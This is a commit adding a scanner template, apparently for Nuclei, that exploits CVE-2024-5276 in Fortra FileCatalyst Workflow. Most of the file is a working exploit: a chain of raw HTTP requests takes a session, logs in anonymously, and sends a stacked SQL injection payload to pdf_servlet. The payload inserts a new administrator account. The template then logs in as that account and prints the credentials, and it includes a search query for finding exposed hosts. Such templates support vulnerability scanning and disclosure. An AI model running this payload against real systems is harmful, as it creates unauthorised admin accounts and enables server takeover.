Create CVE-2024-5276.yaml

patch-12
Dhiyaneshwaran 2024-09-18 23:25:29 +05:30 committed by GitHub
parent 500b429d73
commit 6500e7509d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 132 additions and 0 deletions

View File

@ -0,0 +1,132 @@
id: CVE-2024-5276
info:
name: Fortra FileCatalyst Workflow <= v5.1.6 build 135 Unauthenticated SQLi
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data.  Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
reference:
- https://www.tenable.com/security/research/tra-2024-25
- https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0
- https://www.fortra.com/security/advisory/fi-2024-008
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5276
cwe-id: CWE-20
epss-score: 0.00198
epss-percentile: 0.57788
metadata:
fofa-query: body="FileCatalyst file transfer solution, easily transfer large files"
verified: true
tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive
variables:
ctxpath: "workflow"
username: "{{randstr}}"
password: '{{randstr_2}}'
password_enc: "{{to_upper(md5(password))}}"
payload: "1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ENCPASSWORD, FIRSTNAME, LASTNAME, COMPANY, ADDRESS, ADDRESS2, CITY, STATE, ALTPHONE, ZIP, COUNTRY, PHONE, FAX, EMAIL, LASTLOGIN, CREATION, PREFERREDSERVER, CREDITCARDTYPE, CREDITCARDNUMBER, CREDITCARDEXPIRY, ACCOUNTSTATUS, USERTYPE, COMMENT, ADMIN, SUPERADMIN, ACCEPTEMAIL, ALLOWHOTFOLDER, PROTOCOL, BANDWIDTH, DIRECTORY, SLOWSTARTRATE, USESLOWSTART, SLOWSTARTAGGRESSIONRATE, BLOCKSIZE, UNITSIZE, NUMENCODERS, NUMFTPSTREAMS, ALLOWUSERBANDWIDTHTUNING, EXPIRYDATE, ALLOWTEMPACCOUNTCREATION, OWNERUSERNAME, USERLEVEL, UPLOADMETHOD, PW_CHANGEABLE, PW_CREATIONDATE, PW_DAYSBEFOREEXPIRE, PW_MUSTCHANGE, PW_USEDPASSWORDS, PW_NUMERRORS) VALUES('{{to_lower(username)}}', NULL, '{{password_enc}}', '{{to_lower(username)}}FirstName', '{{to_lower(username)}}LastName', '', '', '', '', '', '', '', '', '202-404-2400', '', '{{to_lower(username)}}@mydomain.local', 1714014839723, 1714013661166, 'default', '', '', '', 'full access', '', '', 1, 0, 0, 0, 'DEFAULT', '0', 0, '0', 1, '', '', '', '', '', 0, 0, 0, '', 0, 'DEFAULT', 0, 1714014752270, -1, 0, NULL, 0);-- -"
http:
- raw:
- |
GET /{{ctxpath}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: jsessionid
internal: true
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'logonAnonymous.do'
internal: true
extractors:
- type: regex
part: body
group: 1
name: anonurl
internal: true
regex:
- 'href="(.*)" class="btn btn-outline-primary" id="logonAnonymousLink"'
- raw:
- |
GET {{anonurl}} HTTP/1.1
Host: {{Hostname}}
- raw:
- |
GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1
Host: {{Hostname}}
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1
Host: {{Hostname}}
disable-cookie: true
extractors:
- type: regex
part: body
group: 1
name: fcweb_token
internal: true
regex:
- 'name="FCWEB.FORM.TOKEN" value="([A-Za-z0-9]+)"'
- type: regex
part: body
group: 1
name: jsessionid2
internal: true
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
- raw:
- |
POST /{{ctxpath}}/logon.do HTTP/1.1
Host: {{Hostname}}
Cookie: JSESSIONID={{jsessionid2}}
Content-Type: application/x-www-form-urlencoded
FCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&
disable-cookie: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username/password are not correct'
- 'Your session timed out.'
negative: true
- type: word
part: body
words:
- '<title>FileCatalyst Workflow Administration</title>'
- '{{to_lower(username)}}'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'